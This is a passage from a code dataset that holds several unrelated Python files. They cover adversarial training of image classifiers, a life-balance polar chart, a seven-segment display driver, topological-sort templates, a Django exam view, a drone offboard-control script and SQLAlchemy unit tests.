*\nfrom train.train_base import TrainerBase\nfrom utils.AverageMeter import AverageMeter\nfrom torch.cuda.amp import autocast as autocast\n\n\nclass TrainerEns(TrainerBase):\n def __init__(self, cfg, writer, device, loss_function=torch.nn.CrossEntropyLoss(), static_model=None,\n holdout_model=None):\n super(TrainerEns, self).__init__(cfg, writer, device, loss_function)\n self.static_model = static_model\n self.holdout_model = holdout_model\n self.num_static_model = len(self.static_model)\n\n def train_one_epoch(self, model, train_loader, optimizer, epoch):\n nat_result = AverageMeter()\n adv_w_result = AverageMeter()\n adv_b_result = AverageMeter()\n with tqdm(total=len(train_loader)) as _tqdm:\n _tqdm.set_description('epoch:{}/{} Training:'.format(epoch + 1, self.cfg.TRAIN.epochs))\n for idx, (data, label) in enumerate(train_loader):\n n = data.size(0)\n data, label = data.to(self.device), label.to(self.device)\n # Random choice\n selected = np.random.randint(self.num_static_model + 1)\n if selected == self.num_static_model:\n selected_model = model\n else:\n selected_model = self.static_model[selected]\n selected_model.eval()\n\n attack_method = self._get_attack(selected_model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n\n model.train()\n # Forward\n if self.amp:\n with autocast():\n adv_data = attack_method(data, label)\n nat_output = model(data)\n adv_output = model(adv_data)\n nat_loss = self.loss_fn(nat_output, label)\n adv_loss = self.loss_fn(adv_output, label)\n loss = 0.5 * (nat_loss + adv_loss)\n else:\n adv_data = attack_method(data, label)\n nat_output = model(data)\n adv_output = model(adv_data)\n nat_loss = self.loss_fn(nat_output, label)\n adv_loss = self.loss_fn(adv_output, label)\n loss = 0.5 * (nat_loss + adv_loss)\n\n # Backward\n if self.amp:\n optimizer.zero_grad()\n self.scaler.scale(loss).backward()\n self.scaler.step(optimizer)\n self.scaler.update()\n else:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Validation during training\n if (idx + 1) % self.cfg.TRAIN.print_freq == 0 or (idx + 1) == len(train_loader):\n # clean data\n with torch.no_grad():\n nat_output = model(data)\n nat_correct_num = (torch.max(nat_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n nat_result.update(nat_correct_num, n)\n\n # white-box adv attack\n attack_method = self._get_attack(model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n adv_data_w = attack_method(data, label)\n with torch.no_grad():\n adv_w_output = model(adv_data_w)\n adv_w_correct_num = (torch.max(adv_w_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()).\\\n astype(int).sum()\n adv_w_result.update(adv_w_correct_num, n)\n\n # black-box adv attack\n attack_method = self._get_attack(self.holdout_model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n adv_data_b = attack_method(data, label)\n with torch.no_grad():\n adv_b_output = model(adv_data_b)\n adv_b_correct_num = (torch.max(adv_b_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n adv_b_result.update(adv_b_correct_num, n)\n\n _tqdm.set_postfix(loss='{:.3f}'.format(loss.item()),\n nat_acc='{:.3f}%'.format(nat_result.acc_cur * 100),\n wb_rob_acc='{:.3f}%'.format(adv_w_result.acc_cur * 100),\n bb_rob_acc='{:.3f}%'.format(adv_b_result.acc_cur * 100))\n if not idx + 1 == len(train_loader):\n _tqdm.update(self.cfg.TRAIN.print_freq)\n else:\n _tqdm.update(len(train_loader) % self.cfg.TRAIN.print_freq)\n\n if self.writer is not None:\n self.writer.add_scalar('Train/Loss_adv', adv_loss.item(), self._iter)\n self.writer.add_scalar('Train/Loss_nat', nat_loss.item(), self._iter)\n self.writer.add_scalar('Train/Nat._Acc', nat_result.acc_cur * 100, self._iter)\n self.writer.add_scalar(f'Train/{self._get_attack_name()}_Whitebox_Acc',\n adv_w_result.acc_cur * 100, self._iter)\n self.writer.add_scalar(f'Train/{self._get_attack_name()}_Blackbox_Acc',\n adv_b_result.acc_cur * 100, self._iter)\n self.writer.add_scalar('Train/Lr', optimizer.param_groups[0][\"lr\"], self._iter)\n self._iter += 1\n self.scheduler.step()\n\n def train(self, model, train_loader, valid_loader):\n opt = torch.optim.SGD(model.parameters(), self.cfg.TRAIN.lr, weight_decay=self.cfg.TRAIN.weight_decay,\n momentum=self.cfg.TRAIN.momentum)\n self.scheduler = self.get_lr_scheduler(opt, self.cfg.TRAIN.lr_scheduler_name, len(train_loader))\n\n for epoch in range(0, self.cfg.TRAIN.epochs):\n # training\n self.train_one_epoch(model, train_loader, opt, epoch)\n\n # validation\n valid_acc, valid_adv_w_acc, valid_adv_b_acc = self.valid(model, valid_loader)\n\n if valid_adv_b_acc >= self.best_robust_acc:\n self.best_clean_acc = valid_acc\n self.best_robust_acc = valid_adv_b_acc\n self.best_epoch = epoch\n self.save_checkpoint(model, epoch, is_best=True)\n\n print(f'[EVAL] [{epoch}]/[{self.cfg.TRAIN.epochs}]:\\n'\n f'nat_acc:{valid_acc * 100}% adv_w_acc:{valid_adv_w_acc * 100}% adv_w_acc:{valid_adv_b_acc * 100}%\\n'\n f'best_epoch:{self.best_epoch}\\tbest_rob_acc:{self.best_robust_acc * 100}%\\n')\n\n # write to TensorBoard\n if self.writer is not None:\n self.writer.add_scalar('Valid/Nat._Acc', valid_acc, epoch)\n self.writer.add_scalar(f'Valid/{self._get_attack_name(train=False)}_Whitebox_Acc', valid_adv_w_acc,\n epoch)\n self.writer.add_scalar(f'Valid/{self._get_attack_name(train=False)}_Blackbox_Acc', valid_adv_b_acc,\n epoch)\n\n # save checkpoint\n if self.cfg.TRAIN.save_ckp_freq != -1 and epoch % self.cfg.TRAIN.save_ckp_freq == 0:\n self.save_checkpoint(model, epoch)\n\n def valid(self, model, valid_loader):\n nat_result = AverageMeter()\n adv_w_result = AverageMeter()\n adv_b_result = AverageMeter()\n attack_method_w = self._get_attack(model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n attack_method_b = self._get_attack(self.holdout_model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n\n model.eval()\n with torch.no_grad():\n with tqdm(total=len(valid_loader)) as _tqdm:\n _tqdm.set_description('Validating:')\n for idx, (data, label) in enumerate(valid_loader):\n data, label = data.to(self.device), label.to(self.device)\n n = data.size(0)\n\n # validation using natural data\n nat_output = model(data)\n nat_correct_num = (torch.max(nat_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n nat_result.update(nat_correct_num, n)\n\n # adv attack\n with torch.enable_grad():\n adv_w_data = attack_method_w(data, label)\n adv_b_data = attack_method_b(data, label)\n\n adv_w_output = model(adv_w_data)\n adv_b_output = model(adv_b_data)\n\n adv_w_correct_num = (\n torch.max(adv_w_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n adv_w_result.update(adv_w_correct_num, n)\n\n adv_b_correct_num = (\n torch.max(adv_b_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n adv_b_result.update(adv_b_correct_num, n)\n\n if self.cfg.method != 'nature':\n _tqdm.set_postfix(nat_acc='{:.3f}%'.format(nat_result.acc_avg * 100),\n rob_w_acc='{:.3f}%'.format(adv_w_result.acc_avg * 100),\n rob_b_acc='{:.3f}%'.format(adv_b_result.acc_avg * 100))\n\n _tqdm.update(1)\n model.train()\n return nat_result.acc_avg, adv_w_result.acc_avg, adv_b_result.acc_avg\n","repo_name":"CHENBIN99/Adversarial-training","sub_path":"train/train_ens_adv.py","file_name":"train_ens_adv.py","file_ext":"py","file_size_in_byte":10607,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"22080934386","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef draw_stylish_wheel_of_life(data, categories, title=\"Wheel of Life\"):\n N = len(categories)\n theta = np.linspace(0.0, 2 * np.pi, N, endpoint=False)\n radii = data\n width = np.pi / 4 * np.ones(N)\n\n fig, ax = plt.subplots(figsize=(6,6), subplot_kw={'projection': 'polar'})\n bars = ax.bar(theta, radii, width=width, bottom=0.0, align='center', edgecolor='gray', linewidth=0.5)\n\n # A clearer color palette - can be customized\n colors = [\"#FF9999\", \"#66B2FF\", \"#99FF99\", \"#FFCC99\", \"#FFD700\", \"#C71585\", \"#20B2AA\", \"#FF4500\"]\n for bar, color in zip(bars, colors):\n bar.set_facecolor(color)\n bar.set_alpha(0.7)\n\n # Remove gridlines and outer circle (spine)\n ax.yaxis.grid(False)\n ax.xaxis.grid(False)\n ax.spines[\"polar\"].set_visible(False)\n\n # Remove ytick labels and set xtick labels with padding and custom font properties\n ax.set_yticklabels([])\n ax.set_xticks(theta)\n ax.set_xticklabels(categories, fontdict={'fontsize': 10, 'fontweight': 'bold', 'color': '#555555'})\n\n # Set title with custom font properties\n ax.set_title(title, va='bottom', fontdict={'fontsize': 14, 'fontweight': 'bold'})\n\n # Add padding to the image\n plt.tight_layout()\n\n # Save as a high-res image with a transparent background\n plt.savefig(\"stylish_wheel_of_life.png\", dpi=300, bbox_inches='tight', transparent=True)\n plt.show()\n\ndata_points = [5, 7, 3, 8, 9, 4, 7, 6]\nareas = [\"Health\", \"Relationships\", \"Career\", \"Finance\", \"Learning\", \"Leisure\", \"Physical Environment\", \"Personal Growth\"]\n\ndraw_stylish_wheel_of_life(data_points, areas)\n\n","repo_name":"rafimk/chart-app","sub_path":"chart-app.py","file_name":"chart-app.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"32536743885","text":"\n# Project: \t\tCS426 Spring 2018, Team #23: SkyWarden ADNS Senior Project, Aerial Drone Notification System (ADNS) \n# Team:\t\t\tRony Calderon, Bryan Kline, Jia Li, Robert Watkins\n# Subsystem:\tGround Base Unit\n# File name:\tPinSevenSegment.py \n# Description:\tPinSevenSegment class implementation\t\n#\t\t\t\tSevenSegment class establishes one four digit seven segment displays\n#\t\t\t\tand continually writes four digit values to it, values corresponding to \n#\t\t\t\tthe voltage from the drone created for the 5641AS Common Anode Seven Segment \n#\t\t\t\tDisplay, acts as backup for the ShiftSevenSegment class in the event the\n#\t\t\t\tthe module containing two seven segment displays controlled by a shift register\n#\t\t\t\tand D-latch fail\n\n# Hardware:\n# Seven Segment Display:\t\t\t5641AS Common Anode Seven Segment Display\n\nfrom gpiozero import LED\nfrom time import sleep\n\nclass PinSevenSegment:\n\n\t# constant for pins on the Raspberry Pi\n\t__D0_PIN = 27\n\t__D1_PIN = 22\n\t__D2_PIN = 23\n\t__D3_PIN = 24\n\t__DP_PIN = 21\n\t__A_PIN = 20\n\t__B_PIN = 16\n\t__C_PIN = 26\n\t__D_PIN = 19\n\t__E_PIN = 13\n\t__F_PIN = 6\n\t__G_PIN = 5\n\t\n\t__PERIOD_CHAR = '.'\n\t__DISPLAY_DELAY = 0.005\n\t__MAX_DIGITS = 4\n\t\n\t# creation of pin objects\n\t__D0 = LED(__D0_PIN)\n\t__D1 = LED(__D1_PIN)\n\t__D2 = LED(__D2_PIN)\n\t__D3 = LED(__D3_PIN)\n\n\t__A = LED(__A_PIN)\n\t__B = LED(__B_PIN)\n\t__C = LED(__C_PIN)\n\t__D = LED(__D_PIN)\n\t__E = LED(__E_PIN)\n\t__F = LED(__F_PIN)\n\t__G = LED(__G_PIN)\n\t__DP = LED(__DP_PIN)\n\t\n\t# Name:\t\t\tDefault constructor\n\t# Description:\tPinSevenSegment class default constructor which initializes the display\n\t#\t\t\t\tby zeroing out the pins and digits\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef __init__(self):\n\t\t\n\t\tself.allPinsOff()\n\t\tself.zero()\n\n\t# Name:\t\t\tallPinsOff\n\t# Description:\tPinSevenSegment class method which writes all digit pins high which turns them\n\t# \t\t\t\toff\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef allPinsOff(self):\n\t\t\n\t\tself.__D0.on()\n\t\tself.__D1.on()\n\t\tself.__D2.on()\n\t\tself.__D3.on()\n\n\t# Name:\t\t\tzero\n\t# Description:\tPinSevenSegment class method which writes all segment pins low which turns\n\t# \t\t\t\tthem off, zeroing out the digit\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef zero(self):\n\n\t\tself.__A.off()\n\t\tself.__B.off()\n\t\tself.__C.off()\n\t\tself.__D.off()\n\t\tself.__E.off()\n\t\tself.__F.off()\n\t\tself.__G.off()\n\t\tself.__DP.off()\n\n\t# Name:\t\t\tselectDigit\n\t# Description:\tPinSevenSegment class method which takes in the digit to be activated, turns\n\t# \t\t\t\tall digits off, and then activates the the one passed in as a parameter \n\t# Parameters:\tTakes in an int corresponding to the digit on the display which will be\n\t# \t\t\t\tactivated\n\t# Return:\t\tNone\n\tdef selectDigit(self, digit):\n\t\t\n\t\tself.allPinsOff()\n\n\t\tif digit == 0:\n\t\t\tself.__D0.off()\t\n\t\tif digit == 1:\n\t\t\tself.__D0.off()\n\t\tif digit == 2:\n\t\t\tself.__D0.off()\n\t\tif digit == 3:\n\t\t\tself.__D0.off()\n\n\t# Name:\t\t\tallOn\n\t# Description:\tPinSevenSegment class method which turns all digits and all segments on for\n\t#\t\t\t\ttesting purposes\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef allOn(self):\n\t\t\n\t\tself.__D0.off()\n\t\tself.__D1.off()\n\t\tself.__D2.off()\n\t\tself.__D3.off()\n\t\t\n\t\tself.__A.on()\n\t\tself.__B.on()\n\t\tself.__C.on()\n\t\tself.__D.on()\n\t\tself.__E.on()\n\t\tself.__F.on()\n\t\tself.__G.on()\n\t\tself.__DP.on()\n\n\t# Name:\t\t\tallPinsOff\n\t# Description:\tPinSevenSegment class method which takes in strings corresponding to the voltage value\n\t# \t\t\t\tto be displayed on the seven segment and the proximity threshold which is only\n\t# \t\t\t\tincluded so as to make the interface compatible with the class method's use\n\t# \t\t\t\telsewhere in the program and which is discarded\n\t# Parameters:\tTakes in two strings, the voltage value and the proximity value, both as strings\n\t# Return:\t\tNone\n\tdef displayNumber(self, voltage, proximity):\n\n\t\tvoltageSize = len(voltage)\n\t\t\n\t\tif voltageSize > 0:\n\t\t\tdecimal = False\n\n\t\t\t# the string is reversed so that the least significant digits are \n\t\t\t# at the front of the string \n\t\t\tvoltageString = \"\".join(reversed(voltage))\n\t\t\t\n\t\t\tdigitSelect = 0\n\t\t\tcounter = 0\n\n\t\t\t# iterates through the string and writes it, digit by digit, to the\n\t\t\t# seven segment display\n\t\t\twhile counter < voltageSize and digitSelect < self.__MAX_DIGITS:\n\t\t\t\n\t\t\t\t# if a decimal point is encountered, a bool is set and the position in\n\t\t\t\t# the string is advanced past it\n\t\t\t\tif voltageString[counter] == self.__PERIOD_CHAR:\n\t\t\t\t\tdecimal = True \n\t\t\t\t\tcounter += 1\n\n\t\t\t\t# the previous number is zeroed out and the appropriate digit on the \n\t\t\t\t# seven segment is selected\n\t\t\t\tself.zero()\n\t\t\t\tself.selectDigit(digitSelect)\n\t\t\t\t\n\t\t\t\t# the current digit in the string is written to the seven segment display,\n\t\t\t\t# a sleep is used to make the digit visible to the eye\n\t\t\t\tself.numberSelect(voltageString[counter], decimal)\n\t\t\t\tsleep(self.__DISPLAY_DELAY)\n\n\t\t\t\tdecimal = False\n\t\t\t\tcounter += 1\n\t\t\t\tdigitSelect += 1\n\n\t# Name:\t\t\tnumberSelect\n\t# Description:\tPinSevenSegment class method takes in a char which is the number to be written\n\t# \t\t\t\tto the digit and a bool corresponding to whether or not the decimal point will\n\t# \t\t\t\tbe written, and inspects the number to determine which segments to write high\n\t# Parameters:\tTakes in the number to write to the digit as a char and a bool which determines\n\t# \t\t\t\twhether or not the decimal point will be written\n\t# Return:\t\tNone\n\tdef numberSelect(self, number, decimalPoint):\n\t\t\n\t\tif not number == '1' and not number == '4':\n\t\t\tself.__A.on()\n\t\tif not number == '5' and not number == '6':\n\t\t\tself.__B.on()\n\t\tif not number == '2':\n\t\t\tself.__C.on()\n\t\tif not number == '1' and not number == '4' and not number == '7' and not number == '9':\n\t\t\tself.__D.on()\n\t\tif number == '0' or number == '2' or number == '6' or number == '8':\n\t\t\tself.__E.on()\n\t\tif not number == '1' and not number == '2' and not number == '3' and not number == '7':\n\t\t\tself.__F.on()\n\t\tif not number == '0' and not number == '1' and not number == '7':\n\t\t\tself.__G.on()\n\t\t\t\n\t\tif decimalPoint:\n\t\t\tself.__DP.on()\n","repo_name":"SkyWarden/Aerial-Drone-Notification-System","sub_path":"SkyWarden Aerial Drone Notification System Source Code/Ground Base Unit and GUI Subsystems/Ground Unit Source Code/PinSevenSegment.py","file_name":"PinSevenSegment.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72817696917","text":"\"\"\"\n\nDFS vs BFS\n4 type of basic Topo-sort question:\n- a. find any topo-order\n- b. is topo-order exist?\n- c. find ALL topo-order (DFS)\n- d. check if topo-order is unique (maximum 1 node in queue at all time)\n\nQuestions:\n- 268\n- 802\n- 484\n\"\"\"\n\nfrom collections import defaultdict, deque\nfrom typing import List\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, val=0, neighbors=None):\n self.val = val\n self.neighbors = neighbors if neighbors is not None else []\n\n def __repr__(self) -> str:\n return str(self.val)\n\n\nclass ClrsTopoSort:\n \"\"\"\n https://github.com/stevenhalim/cpbook-code/blob/master/ch4/traversal/toposort.py\n \"\"\"\n\n def toposort(self, V: int, AL: list[list[int]]):\n \"\"\"\n Runtime: 104 ms, faster than 43.92% of Python3 online submissions for Course Schedule II.\n\n XXX: no need of visited set, since CLRS depends on dfn (aka color)\n \"\"\"\n WHITE, GRAY, BLACK = 0, 1, 2\n cyclic = False\n dfn = defaultdict(int)\n ts = []\n\n def dfs(u):\n nonlocal cyclic\n if cyclic:\n return\n\n # !mark visiting here, rather before dfs. ow, we need to mark it in for u in range(V) as well.\n dfn[u] = GRAY\n for v in AL[u]:\n if dfn[v] == WHITE:\n dfs(v)\n elif dfn[v] == GRAY:\n cyclic = True\n dfn[u] = BLACK\n ts.append(u)\n\n for u in range(V):\n if dfn[u] == WHITE:\n dfs(u)\n if cyclic:\n return []\n return ts[::-1]\n\n\nclass BfsTopoSort:\n def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n \"\"\"\n BEST topo-sort template for leetcode\n Runtime: 139 ms, faster than 57.89% of Python3 online submissions for Course Schedule II.\n\n T: O(E+V)\n \"\"\"\n AL = defaultdict(list)\n DEG = {u: 0 for u in range(numCourses)}\n for c, p in prerequisites:\n AL[p].append(c)\n DEG[c] += 1\n m = numCourses\n q = deque([i for i in range(m) if DEG[i] == 0])\n ts = []\n while q:\n u = q.popleft()\n ts.append(u)\n if len(ts) == m:\n return ts\n for v in AL[u]:\n DEG[v] -= 1\n if DEG[v] == 0:\n q.append(v)\n return []\n\n def bfs(self, start_node: Node):\n \"\"\"BFS used queue + dist map\n Use case\n ---\n * topological sorting\n * if puzzle has keyword: connection components\n * level order traversal\n * shortest path in Simple Graph\n * Given transform rule, find minimum steps to transform from init to target state\n\n Complexity\n ---\n Time: O(E+V)\n Space: O(V)\n \"\"\"\n # needs queue for BFS\n # and dist map to mark visited and SSSP\n q = deque([start_node])\n dist = {start_node: 0}\n\n while q:\n node = q.popleft()\n if self.is_target(node):\n return \"Found target\"\n for neig in node.neighbors:\n if neig in dist:\n continue\n q.append(neig)\n dist[neig] = dist[neig] + 1\n\n # if we need to find shortest dist from start_nodde to ALL other nodes\n return dist\n\n # if we need all Connected nodes\n return dist.keys\n\n # if we need SSSP from start to end node\n return dist[end_node]\n\n def topo_sort(self, nodes: List[Node]):\n \"\"\"Use BFS + in-degrees to topological sort\n it also do cycle check\n \"\"\"\n # calcuate in-degrees\n indegrees = self.calc_indegrees(nodes)\n\n # init queue with all nodes with 0 in-degree\n # XXX: till today I found topo-sort's init is ALL 0 in-degree nodes in q.\n # similar idea used in 542. 01 Matrix: https://leetcode.com/problems/01-matrix/discuss/1369741/C%2B%2BJavaPython-BFS-DP-solutions-with-Picture-Clean-and-Concise-O(1)-Space\n q = deque([n for n in nodes if indegrees[n] == 0])\n\n # BFS to process all nodes: decrease indegrees\n topo_order = []\n while q:\n node = q.popleft()\n topo_order.append(node)\n for neig in node.neighbors:\n indegrees[neig] -= 1\n if indegrees[neig] == 0:\n q.append(neig)\n\n # check if cycle, cool!\n if len(topo_order) != len(nodes):\n return False, \"no topo order due to cycle!\"\n return topo_order\n\n def calc_indegrees(self, nodes: List[Node]):\n counter = {node: 0 for node in nodes}\n for node in nodes:\n for neig in node.neighbors:\n counter[neig] += 1\n return counter\n\n def is_target(self, node: Node):\n \"\"\"dummy endpoint check\"\"\"\n if node.val == 42:\n return True\n return False\n\n\nsl = BfsTopoSort()\nn0, n1, n2, n3 = Node(0), Node(1), Node(2), Node(3)\nn0.neighbors = [n1]\nn1.neighbors = [n2]\nn2.neighbors = [n3]\nn3.neighbors = [n1]\n\nprint(sl.topo_sort([n0, n1, n2, n3]))\n","repo_name":"fxrcode/LeetPy","sub_path":"Template/toposort.py","file_name":"toposort.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9081703241","text":"from django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import *\nfrom django.shortcuts import render_to_response, render\nfrom django.template.loader import render_to_string\nfrom django.template import RequestContext\nfrom django.http import *\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import *\nimport models\nimport datetime\nimport json\n# import forms\n\nclass Test:\n current_tests = {}\n \"\"\"A test class representing the test a user is taking\"\"\"\n def __init__(self, user):\n self.user = user\n self.score = 0\n # Ten questions in Ten minutes\n self.num_questions = 10\n self.duration = datetime.timedelta(minutes=10)\n self.num_solved_questions = 0\n self.questions_seen = []\n self.last_question, self.second_last_question = None, None\n self.current_difficulty = 4\n self.start_time = datetime.datetime.now()\n self.finish_time = self.start_time + self.duration\n self.current_question = self.get_new_question(self.current_difficulty)\n\n def get_new_question(self, difficulty):\n q = models.Question.objects.filter(difficulty=difficulty).order_by('?')[0]\n while q.pk in self.questions_seen:\n q = models.Question.objects.filter(difficulty=difficulty).order_by('?')[0]\n return q\n\n def solve_current(self, answer):\n if self.current_question.correct_option == answer:\n self.score += self.current_question.difficulty\n self.current_question.correct = True\n else:\n self.current_question.correct = False\n self.num_solved_questions += 1\n self.questions_seen.append(self.current_question.pk)\n self.second_last_question, self.last_question = self.last_question, self.current_question\n if self.second_last_question and self.last_question:\n if self.second_last_question.correct and self.last_question.correct:\n self.current_difficulty = min(10, self.current_difficulty + 1)\n elif (not self.second_last_question.correct) and (not self.last_question.correct):\n self.current_difficulty = max(1, self.current_difficulty - 1)\n if not self.finished:\n self.current_question = self.get_new_question(self.current_difficulty)\n\n @property\n def finished(self):\n return datetime.datetime.now() > self.finish_time or self.num_solved_questions == self.num_questions\n\n @classmethod\n def user_check_current_test(cls, user):\n return cls.current_tests[user.username] if user.username in cls.current_tests else None\n\n @classmethod\n def get_test(cls, user):\n #don't use setdefault here\n if user.username not in cls.current_tests:\n cls.current_tests[user.username] = Test(user)\n return cls.current_tests[user.username]\n\n\n@login_required\ndef home(request):\n mydict = {}\n mydict['test_running'] = Test.user_check_current_test(request.user)\n return render_to_response('home.html', mydict, context_instance=RequestContext(request))\n\n\n@login_required\ndef continue_test(request):\n if request.method == 'GET':\n raise Http404\n test = Test.get_test(request.user)\n if 'option_checked' in request.POST and not test.finished:\n test.solve_current(int(request.POST.get('option_checked')))\n result_dict = dict(finish_time='new Date(\"%s\")' % test.finish_time.ctime(), num_solved_questions=test.num_solved_questions, num_questions=test.num_questions)\n if test.finished:\n result_dict['finished'] = True\n result_dict['score'] = test.score\n del Test.current_tests[request.user.username]\n else:\n result_dict['current_question'] = test.current_question.to_dict()\n return HttpResponse(json.dumps(result_dict))\n","repo_name":"prongs/OnlineExam","sub_path":"exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33945330028","text":"#! /usr/bin/env python\n\nimport rospy\nimport mavros\nimport numpy as np\nfrom geometry_msgs.msg import PoseStamped\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.srv import CommandBool, CommandBoolRequest, SetMode, SetModeRequest\n\nclass Drone:\n def __init__(self):\n rospy.wait_for_service(\"/mavros/set_mode\")\n rospy.wait_for_service(\"/mavros/cmd/arming\")\n \n\n self.state_sub = rospy.Subscriber(\"mavros/state\", State, callback = self.state_cb)\n self.local_pose_sub = rospy.Subscriber('/mavros/local_position/pose', PoseStamped, self.pose_cb)\n self.local_pos_pub = rospy.Publisher(\"mavros/setpoint_position/local\", PoseStamped, queue_size=10)\n self.arming_client = rospy.ServiceProxy(\"mavros/cmd/arming\", CommandBool)\n self.set_mode_client = rospy.ServiceProxy(\"mavros/set_mode\", SetMode)\n \n self.current_state = None\n self.pose = None\n self.yaw = 0\n self.hz = 20\n self.rate = rospy.Rate(self.hz)\n\n\n def state_cb(self, msg):\n self.current_state = msg\n\n def pose_cb(self, msg):\n self.pose = [msg.pose.position.x, msg.pose.position.y, msg.pose.position.z ]\n\n def arm(self):\n\n for i in range(100):\n self.publish_pose([0,0,-1])\n self.rate.sleep()\n # Wait for Flight Controller connection\n\n while(not rospy.is_shutdown() and not self.current_state.connected):\n self.rate.sleep()\n\n offb_set_mode = SetModeRequest()\n offb_set_mode.custom_mode = 'OFFBOARD'\n\n arm_cmd = CommandBoolRequest()\n arm_cmd.value = True\n\n last_req = rospy.Time.now()\n\n while(not rospy.is_shutdown()):\n\n if(self.current_state.mode != \"OFFBOARD\" and (rospy.Time.now() - last_req) > rospy.Duration(2.0)):\n if(self.set_mode_client.call(offb_set_mode).mode_sent == True):\n rospy.loginfo(\"OFFBOARD enabled\")\n\n last_req = rospy.Time.now()\n else:\n if(not self.current_state.armed and (rospy.Time.now() - last_req) > rospy.Duration(2.0)):\n if(self.arming_client.call(arm_cmd).success == True):\n rospy.loginfo(\"Vehicle armed\")\n last_req = rospy.Time.now()\n if self.current_state.armed:\n # Update timestamp and publish sp \n break\n self.publish_pose([0,0,-1])\n self.rate.sleep()\n \n def publish_pose(self, position,yaw = np.pi/2):\n new_pose = PoseStamped()\n new_pose.pose.position.x = position[0]\n new_pose.pose.position.y = position[1]\n new_pose.pose.position.z = position[2]\n self.local_pos_pub.publish(new_pose)\n\n def takeoff(self, alt):\n print(\"Takeoff...\")\n position = self.pose\n while self.pose[2] < alt:\n position[2] += 0.1\n self.publish_pose(position)\n self.rate.sleep()\n\n\n \n\n\n\n ","repo_name":"aJimenez19037/CDUS-Cam-Node","sub_path":"catkin_ws/src/offboard_py/scripts/drone2.py","file_name":"drone2.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"934728891","text":"from unittest import TestCase\n\nfrom Services.TransactionService import TransactionService as TS\nfrom Services.DepartmentService import DepartmentService as DS\nfrom Services.EquipmentService import EquipmentService as EqS\nfrom Services.EmployeeService import EmployeeService as EmS\nfrom Services.ReceiptService import ReceiptService as RS\n\nfrom Models.Transaction import Transaction\nfrom Models.Department import Department\nfrom Models.Equipment import Equipment\nfrom Models.Employee import Employee\nfrom Models.Receipt import Receipt\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nimport datetime\n\ndatabase = create_engine('postgres://localhost:5432/myDatabase')\ndatabase.connect()\n\nnow = datetime.datetime.now()\ndate = now.strftime(\"%Y\") + \"-\" + now.strftime(\"%m\") + \"-\" + now.strftime(\"%d\")\n\nSession = sessionmaker(database)\nsession = Session()\n\ndefault_rec = Receipt(id=\"ID\", supplement=\"IDK\", year=2020)\nRS.add_receipt(session=session, receipt=default_rec)\n\ndefault_eq = Equipment(id=1, price=22000, model=\"Skjerm\", buy_date=date,\n receipt_id=\"ID\", description=\"Solid work\", note=\"Do not drop\")\nEqS.add_equipment(session=session, equipment=default_eq)\n\ndefault_dep = Department(id=1, country=\"Norway\", unit=\"Bergen\")\nDS.add_department(session=session, department=default_dep)\n\ndefault_emp = Employee(id=\"E1\", name=\"Smiedth\", department_id=default_dep.id)\nEmS.add_employee(session=session, employee=default_emp)\n\ndefault_emp2 = Employee(id=\"E4\", name=\"Jon\", department_id=default_dep.id)\nEmS.add_employee(session=session, employee=default_emp2)\n\n\nclass TestTransactionService(TestCase):\n def test_add_transaction(self):\n trans = Transaction(employee_id=\"E1\", equipment_id=1)\n self.assertTrue(TS.add_transaction(session=session, transaction=trans))\n self.assertTrue(TS.add_transaction(session=session, employee_id=\"E1\", equipment_id=1))\n self.assertFalse(TS.add_transaction(session=session, employee_id=0, equipment_id=1))\n\n def test_update_transaction(self):\n trans = Transaction(id=10, employee_id=\"E1\", equipment_id=1)\n TS.add_transaction(session=session, transaction=trans)\n self.assertEqual(trans, TS.find_transaction(session, 10))\n TS.update_transaction(session, 10, 1, \"E4\")\n self.assertNotEqual(\"E1\", TS.find_transaction(session, 10).employee_id)\n\n def 